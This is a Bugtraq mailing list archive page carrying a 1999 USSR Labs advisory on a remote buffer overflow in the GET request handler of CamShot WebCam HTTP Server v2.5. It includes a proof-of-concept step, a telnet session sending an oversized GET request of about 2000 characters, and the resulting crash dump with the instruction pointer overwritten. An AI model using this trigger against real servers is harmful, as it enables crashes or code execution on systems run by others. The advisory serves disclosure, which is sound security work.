Bugtraq mailing list archives
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT
From: labs () USSRBACK COM (Ussr Labs)
Date: Thu, 30 Dec 1999 14:06:16 -0300
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT USSR Advisory Code: USSR-99028 Release Date: December 30, 1999 [4/5] Systems Affected: CamShot WebCam HTTP Server v2.5 for Win9x and possibly others versions. About The Software: CamShot is a Windows 95/98/NT web server that serves up web pages containing time stamped images captured from a video camera. The images can be viewed from anywhere on the network with a web browser. CamShot works with Video For Windows compatible video equipment. Finally a cheap and simple way to do remote surveillance is here!. THE PROBLEM UssrLabs found a Local / Remote Buffer overflow, The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed. Do you do the w00w00? This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is don't you? http://www.w00w00.org/advisories.html Example [hell@imahacker]$ telnet die.communitech.net 80 Trying example.com... Connected to die.communitech.net Escape character is '^]'. GET (buffer) HTTP/1.1 <enter><enter> Where [buffer] is aprox. 2000 characters. At his point the server overflows. And in remote machine someone will be see something like this. CAMSHOT caused an invalid page fault in module <unknown> at 0000:61616161. Registers: EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246 EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058 ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff EDX=bff76855 ES=0187 EDI=005a0104 GS=0000 Bytes at CS:EIP: Stack dump: bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74 005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8 Binary or source for this Exploit (wen we finish it): http://www.ussrback.com/ Vendor Status: Informed. Vendor Url: http://www.broadgun.com/arcit/index.html Program Url: http://broadgun.com/Camshot.htm Credit: USSRLABS SOLUTION Noting yet. Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com
Current thread:
- Re: majordomo local exploit Henrik Edlund (Dec 29)
- Re: majordomo local exploit Jefferson Ogata (Dec 29)
- AltaVista followup and monitor script Edward Glowacki (Dec 29)
- Re: majordomo local exploit Chip Salzenberg (Dec 29)
- UnixWare rtpm exploit + discussion Brock Tellier (Dec 30)
- Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT Ussr Labs (Dec 30)
- PC-Cillin 6.x DoS Attack Daniel P. Stasinski (Dec 30)
- Analysis of "stacheldraht" Dave Dittrich (Dec 30)
- Re: Analysis of "stacheldraht" Jordan Ritter (Dec 31)
- Re: Analysis of "stacheldraht" Dave Dittrich (Dec 31)
- Re: Analysis of "stacheldraht" Jordan Ritter (Dec 31)